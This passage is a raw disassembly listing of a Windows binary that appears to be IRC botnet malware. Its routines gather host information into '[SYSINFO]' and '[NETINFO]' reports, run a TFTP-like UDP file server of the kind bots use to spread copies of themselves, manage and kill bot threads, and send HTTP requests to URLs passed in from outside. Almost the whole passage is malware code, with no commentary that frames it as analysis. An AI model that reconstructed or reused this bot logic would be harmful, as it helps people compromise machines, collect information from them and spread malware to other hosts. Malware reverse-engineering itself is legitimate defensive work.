pop ecx
push 104h
push eax
call ds:dword_495364 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_49536C ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_495368 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_495424 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_417900
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_4010AA
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_4011AE
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_401299
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_401217
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_401217
pop ecx
pop ecx
push eax
call sub_401041
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_4163D7
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_414190 endp
; ---------------------------------------------------------------------------
db 0ADh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4144F1 proc near ; CODE XREF: sub_401302�j
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_415CA0
add esp, 0Ch
cmp dword_491744, 0
jnz short loc_414565
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_49152C ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_414546
lea eax, [ebp+var_8C]
push offset aNotConnected ; "Not connected"
push eax
call sub_416821
pop ecx
pop ecx
loc_414546: ; CODE XREF: sub_4144F1+40�j
test [ebp+var_C], 1
jz short loc_41455E
push offset aDialUp ; "Dial-up"
loc_414551: ; CODE XREF: sub_4144F1+72�j
lea eax, [ebp+var_8]
push eax
call sub_416821
pop ecx
pop ecx
jmp short loc_414584
; ---------------------------------------------------------------------------
loc_41455E: ; CODE XREF: sub_4144F1+59�j
push offset dword_4356E4
jmp short loc_414551
; ---------------------------------------------------------------------------
loc_414565: ; CODE XREF: sub_4144F1+28�j
mov esi, offset off_4356E0
lea eax, [ebp+var_8]
push esi
push eax
call sub_416821
lea eax, [ebp+var_8C]
push esi
push eax
call sub_416821
add esp, 10h
loc_414584: ; CODE XREF: sub_4144F1+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_401299
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_4163D7
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_4144F1 endp
; ---------------------------------------------------------------------------
db 31h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4145E8 proc near ; CODE XREF: sub_4012EE�j
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call dword_4916DC ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_4146AB
push 190h
call ds:dword_495324 ; Sleep
call dword_4915F0 ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset dword_4357FC
push eax
call sub_416821
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_41468B
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_4010D2
add esp, 14h
loc_41468B: ; CODE XREF: sub_4145E8+7E�j
lea eax, [ebp+var_780]
push eax
call sub_401014
push [ebp+var_170]
call sub_4012A3
pop ecx
pop ecx
push ebx
call ds:dword_495334 ; ExitThread
loc_4146AB: ; CODE XREF: sub_4145E8+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov dword_43E92C[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_415CA0
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call dword_49165C ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call dword_491688 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_414710
push 1388h
call ds:dword_495324 ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_414AD3
; ---------------------------------------------------------------------------
loc_414710: ; CODE XREF: sub_4145E8+10D�j
lea eax, [ebp+var_378]
push offset dword_42B830
push eax
call sub_417012
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_41478E
push 190h
call ds:dword_495324 ; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset dword_4357C4
push eax
call sub_416821
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_4010D2
lea eax, [ebp+var_780]
push eax
call sub_401014
push [ebp+var_170]
call sub_4012A3
add esp, 28h
push ebx
call ds:dword_495334 ; ExitThread
loc_41478E: ; CODE XREF: sub_4145E8+140�j
mov esi, 200h
loc_414793: ; CODE XREF: sub_4145E8+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_414A93
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call dword_491644 ; select
test eax, eax
jle loc_414A87
mov al, byte_4370BC
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call dword_491634 ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_416821
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_414A71
cmp [ebp+var_D7], 1
jnz loc_4149BD
lea eax, [ebp+var_274]
push eax
call sub_4158E0
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_4158E0
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_417B10
add esp, 14h
test eax, eax
jnz loc_414977
lea eax, [ebp+var_1C]
push eax
call sub_4158E0
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_417B10
add esp, 10h
test eax, eax
jnz loc_414977
push ebx
push ebx
push [ebp+var_8]
call sub_417E44
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_416DEA
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call dword_4916C0 ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_435794
loc_41492B: ; CODE XREF: sub_4145E8+484�j
lea eax, [ebp+var_780]
push eax
call sub_416821
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_414965
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_4010D2
add esp, 14h
loc_414965: ; CODE XREF: sub_4145E8+358�j
lea eax, [ebp+var_780]
push eax
call sub_401014
pop ecx
jmp loc_414A87
; ---------------------------------------------------------------------------
loc_414977: ; CODE XREF: sub_4145E8+2B6�j
; sub_4145E8+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_43577C
push edi
call dword_4916C0 ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset dword_435744
push eax
call sub_416821
lea eax, [ebp+var_D8]
push eax
call sub_401014
add esp, 14h
jmp loc_414A87
; ---------------------------------------------------------------------------
loc_4149BD: ; CODE XREF: sub_4145E8+275�j
cmp [ebp+var_D7], 4
jnz loc_414A71
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_4149FA
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_414A08
; ---------------------------------------------------------------------------
loc_4149FA: ; CODE XREF: sub_4145E8+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_414A08: ; CODE XREF: sub_4145E8+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_417E44
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_416DEA
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call dword_4916C0 ; sendto
cmp edi, ebx
jnz short loc_414A87
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_435710
jmp loc_41492B
; ---------------------------------------------------------------------------
loc_414A71: ; CODE XREF: sub_4145E8+268�j
; sub_4145E8+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_435704
push edi
call dword_4916C0 ; sendto
loc_414A87: ; CODE XREF: sub_4145E8+204�j
; sub_4145E8+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_414793
loc_414A93: ; CODE XREF: sub_4145E8+1B4�j
push edi
call dword_4916F4 ; closesocket
push [ebp+var_8]
call sub_416D94
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_414AC7
push [ebp+var_170]
call sub_4012A3
pop ecx
push ebx
call ds:dword_495334 ; ExitThread
loc_414AC7: ; CODE XREF: sub_4145E8+4CA�j
push 3E8h
call ds:dword_495324 ; Sleep
push esi
loc_414AD3: ; CODE XREF: sub_4145E8+123�j
call sub_4012EE
pop edi
pop esi
pop ebx
leave
retn 4
sub_4145E8 endp
; ---------------------------------------------------------------------------
db 13Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414C1C proc near ; CODE XREF: sub_40105F�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43E720
loc_414C24: ; CODE XREF: sub_414C1C+18�j
cmp byte ptr [eax], 0
jz short loc_414C38
add eax, 234h
inc edi
cmp eax, offset dword_4834B0
jl short loc_414C24
jmp short loc_414C83
; ---------------------------------------------------------------------------
loc_414C38: ; CODE XREF: sub_414C1C+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43E720[esi]
push eax
call sub_416A10
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_43E920[esi], eax
and dword_43E924[esi], 0
mov eax, [esp+8+arg_8]
and dword_43E928[esi], 0
mov dword_43E92C[esi], eax
and byte_43E938[esi], 0
pop esi
loc_414C83: ; CODE XREF: sub_414C1C+1A�j
mov eax, edi
pop edi
retn
sub_414C1C endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_414CA1: ; CODE XREF: sub_4011E5�j
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+8]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp-98h]
rep movsd
push dword ptr [ebp-10h]
mov dword ptr [eax+94h], 1
lea eax, [ebp-94h]
push dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-98h]
call sub_40108C
push dword ptr [ebp-14h]
call sub_4012A3
add esp, 14h
push 0
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 14h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D07 proc near ; CODE XREF: sub_40108C�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
xor edi, edi
mov esi, offset dword_43E720
loc_414D31: ; CODE XREF: sub_414D07+78�j
cmp byte ptr [esi], 0
jz short loc_414D72
cmp [ebp+arg_C], 0
jnz short loc_414D45
cmp dword ptr [esi+204h], 0
jnz short loc_414D72
loc_414D45: ; CODE XREF: sub_414D07+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_416821
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 24h
loc_414D72: ; CODE XREF: sub_414D07+2D�j
; sub_414D07+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4834B0
jl short loc_414D31
pop edi
pop esi
leave
retn
sub_414D07 endp
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414DA4 proc near ; CODE XREF: sub_4010A5�j
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_414E2C
cmp esi, 1F4h
jge short loc_414E2C
imul esi, 234h
push edi
push ebx
push dword_43E934[esi]
lea edi, dword_43E934[esi]
call ds:dword_4953B4 ; TerminateThread
cmp [edi], ebx
jz short loc_414DDC
push 1
pop ebp
loc_414DDC: ; CODE XREF: sub_414DA4+33�j
mov [edi], ebx
lea edi, dword_43E928[esi]
mov dword_43E920[esi], ebx
mov dword_43E924[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_414DFD
push eax
call sub_40124E
pop ecx
loc_414DFD: ; CODE XREF: sub_414DA4+50�j
mov [edi], ebx
lea edi, dword_43E92C[esi]
mov byte ptr dword_43E720[esi], bl
mov byte_43E938[esi], bl
push dword ptr [edi]
call dword_4916F4 ; closesocket
lea esi, dword_43E930[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4916F4 ; closesocket
mov [esi], ebx
pop edi
loc_414E2C: ; CODE XREF: sub_414DA4+D�j
; sub_414DA4+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_414DA4 endp
; ---------------------------------------------------------------------------
db 23h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414E55 proc near ; CODE XREF: sub_401109�j
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43E720
loc_414E61: ; CODE XREF: sub_414E55+2A�j
cmp byte ptr [esi], 0
jz short loc_414E72
push edi
call sub_4010A5
test eax, eax
pop ecx
jz short loc_414E72
inc ebx
loc_414E72: ; CODE XREF: sub_414E55+F�j
; sub_414E55+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4834B0
jl short loc_414E61
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_414E55 endp
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E93 proc near ; CODE XREF: sub_401285�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43E924
loc_414EA7: ; CODE XREF: sub_414E93+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_414EC9
test edi, edi
jle short loc_414EBB
cmp [esi], edi
jz short loc_414EBB
cmp ebx, edi
jnz short loc_414EC9
loc_414EBB: ; CODE XREF: sub_414E93+1E�j
; sub_414E93+22�j
push ebx
call sub_4010A5
test eax, eax
pop ecx
jz short loc_414EC9
inc [ebp+var_4]
loc_414EC9: ; CODE XREF: sub_414E93+1A�j
; sub_414E93+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4836B4
jl short loc_414EA7
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414E93 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414EF3 proc near ; CODE XREF: sub_4010E6�j
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43E920
loc_414EFA: ; CODE XREF: sub_414EF3+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_414F03
inc eax
loc_414F03: ; CODE XREF: sub_414EF3+D�j
add ecx, 234h
cmp ecx, offset dword_4836B0
jl short loc_414EFA
retn
sub_414EF3 endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414F19 proc near ; CODE XREF: sub_40128A�j
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_43E920
loc_414F23: ; CODE XREF: sub_414F19+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_414F3C
add ecx, 234h
inc edx
cmp ecx, offset dword_4836B0
jl short loc_414F23
pop esi
retn
; ---------------------------------------------------------------------------
loc_414F3C: ; CODE XREF: sub_414F19+10�j
mov eax, edx
pop esi
retn
sub_414F19 endp
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F49 proc near ; CODE XREF: sub_4010A0�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_414F62
push [ebp+arg_1C]
call sub_416CCF
pop ecx
loc_414F62: ; CODE XREF: sub_414F49+E�j
push eax
push [ebp+arg_18]
call sub_401285
pop ecx
test eax, eax
pop ecx
jle short loc_414F8E
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_416821
add esp, 14h
jmp short loc_414FA8
; ---------------------------------------------------------------------------
loc_414F8E: ; CODE XREF: sub_414F49+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_416821
add esp, 10h
loc_414FA8: ; CODE XREF: sub_414F49+43�j
cmp [ebp+arg_C], 0
jnz short loc_414FC8
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
loc_414FC8: ; CODE XREF: sub_414F49+63�j
lea eax, [ebp+var_200]
push eax
call sub_401014
pop ecx
leave
retn
sub_414F49 endp
; ---------------------------------------------------------------------------
db 23h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_414FFA proc near ; CODE XREF: sub_4012A3�j
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_43E934[eax], ecx
mov dword_43E920[eax], ecx
mov dword_43E924[eax], ecx
mov dword_43E928[eax], ecx
mov dword_43E92C[eax], ecx
mov dword_43E930[eax], ecx
mov byte ptr dword_43E720[eax], cl
mov byte_43E938[eax], cl
retn
sub_414FFA endp
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; ---------------------------------------------------------------------------
loc_415046: ; CODE XREF: sub_4011B3�j
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp-35Ch]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp-148h]
push ebx
push eax
mov [ebp-0Ch], ebx
mov [ebp-4], ebx
mov dword ptr [ebp-8], offset dword_4359E4
call sub_415CA0
push edi
lea eax, [ebp-1C8h]
push ebx
push eax
call sub_415CA0
push edi
lea eax, [ebp-0C8h]
push ebx
push eax
call sub_415CA0
push 100h
lea eax, [ebp-65Ch]
push ebx
push eax
call sub_415CA0
push 3Ch
lea eax, [ebp-48h]
pop edi
push edi
push ebx
push eax
call sub_415CA0
add esp, 3Ch
lea eax, [ebp-48h]
mov [ebp-48h], edi
mov [ebp-34h], esi
push eax
lea eax, [ebp-358h]
push ebx
push eax
mov [ebp-28h], esi
mov [ebp-20h], esi
mov [ebp-18h], esi
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-358h]
push eax
call dword_491564 ; InternetCrackUrlA
test eax, eax
jz loc_4151E0
cmp [ebp-34h], ebx
jbe short loc_41511D
push dword ptr [ebp-34h]
lea eax, [ebp-148h]
push dword ptr [ebp-38h]
push eax
call sub_416A10
add esp, 0Ch
loc_41511D: ; CODE XREF: .text:00415106�j
cmp [ebp-28h], ebx
movzx esi, word ptr [ebp-30h]
jbe short loc_41513B
push dword ptr [ebp-28h]
lea eax, [ebp-1C8h]
push dword ptr [ebp-2Ch]
push eax
call sub_416A10
add esp, 0Ch
loc_41513B: ; CODE XREF: .text:00415124�j
cmp [ebp-20h], ebx
jbe short loc_415155
push dword ptr [ebp-20h]
lea eax, [ebp-0C8h]
push dword ptr [ebp-24h]
push eax
call sub_416A10
add esp, 0Ch
loc_415155: ; CODE XREF: .text:0041513E�j
cmp [ebp-18h], ebx
jbe short loc_41516F
push dword ptr [ebp-18h]
lea eax, [ebp-65Ch]
push dword ptr [ebp-1Ch]
push eax
call sub_416A10
add esp, 0Ch
loc_41516F: ; CODE XREF: .text:00415158�j
push ebx
push ebx
lea eax, [ebp-0C8h]
push 3
push eax
lea eax, [ebp-1C8h]
push eax
lea eax, [ebp-148h]
push esi
push eax
push dword_49160C
call dword_491630 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_4151F8
push ebx
lea eax, [ebp-8]
push 200h
push eax
lea eax, [ebp-2D8h]
push eax
lea eax, [ebp-65Ch]
push ebx
push eax
push ebx
push esi
call dword_491624 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp-4], eax
jz short loc_4151FF
push ebx
push ebx
push ebx
push ebx
push eax
call dword_4915D8 ; HttpSendRequestA
test eax, eax
jz short loc_4151D9
push offset dword_4359B8
jmp short loc_415204
; ---------------------------------------------------------------------------
loc_4151D9: ; CODE XREF: .text:004151D0�j
push offset unk_435964
jmp short loc_415204
; ---------------------------------------------------------------------------
loc_4151E0: ; CODE XREF: .text:004150FD�j
lea eax, [ebp-55Ch]
push offset dword_435938
push eax
call sub_416821
mov esi, [ebp-0Ch]
pop ecx
pop ecx
jmp short loc_415212
; ---------------------------------------------------------------------------
loc_4151F8: ; CODE XREF: .text:00415199�j
push offset unk_4358F8
jmp short loc_415204
; ---------------------------------------------------------------------------
loc_4151FF: ; CODE XREF: .text:004151C1�j
push offset unk_4358B0
loc_415204: ; CODE XREF: .text:004151D7�j
; .text:004151DE�j ...
lea eax, [ebp-55Ch]
push eax
call sub_416821
pop ecx
pop ecx
loc_415212: ; CODE XREF: .text:004151F6�j
cmp [ebp-1D4h], ebx
jnz short loc_41523D
push ebx
lea eax, [ebp-55Ch]
push dword ptr [ebp-1D0h]
push eax
lea eax, [ebp-258h]
push eax
push dword ptr [ebp-35Ch]
call sub_4010D2
add esp, 14h
loc_41523D: ; CODE XREF: .text:00415218�j
lea eax, [ebp-55Ch]
push eax
call sub_401014
pop ecx
push esi
call dword_491690 ; InternetCloseHandle
push dword ptr [ebp-4]
call dword_491690 ; InternetCloseHandle
push dword ptr [ebp-1D8h]
call sub_4012A3
pop ecx
push ebx
call ds:dword_495334 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 8Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152FA proc near ; CODE XREF: sub_401113�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_415304: ; CODE XREF: sub_4152FA+68�j
mov cl, [esi]
test cl, cl
jz short loc_415364
cmp eax, 1
jnz short loc_415364
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_415364
cmp cl, 2Ah
jz short loc_41534B
cmp cl, 3Fh
jz short loc_41532E
cmp cl, 5Bh
jz short loc_415333
xor eax, eax
cmp cl, dl
setz al
loc_41532E: ; CODE XREF: sub_4152FA+26�j
inc [ebp+arg_4]
jmp short loc_41535E
; ---------------------------------------------------------------------------
loc_415333: ; CODE XREF: sub_4152FA+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_4010B9
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41535E
; ---------------------------------------------------------------------------
loc_41534B: ; CODE XREF: sub_4152FA+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40129E
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_41535E: ; CODE XREF: sub_4152FA+37�j
; sub_4152FA+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_415304
; ---------------------------------------------------------------------------
loc_415364: ; CODE XREF: sub_4152FA+E�j
; sub_4152FA+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_415374
cmp eax, 1
jnz short loc_41538B
inc esi
mov [ebp+arg_0], esi
jmp short loc_415364
; ---------------------------------------------------------------------------
loc_415374: ; CODE XREF: sub_4152FA+6D�j
cmp eax, 1
jnz short loc_41538B
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_41538B
cmp byte ptr [esi], 0
jnz short loc_41538B
push 1
pop eax
jmp short loc_41538D
; ---------------------------------------------------------------------------
loc_41538B: ; CODE XREF: sub_4152FA+72�j
; sub_4152FA+7D�j ...
xor eax, eax
loc_41538D: ; CODE XREF: sub_4152FA+8F�j
pop esi
pop ebp
retn
sub_4152FA endp
; ---------------------------------------------------------------------------
db 25h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
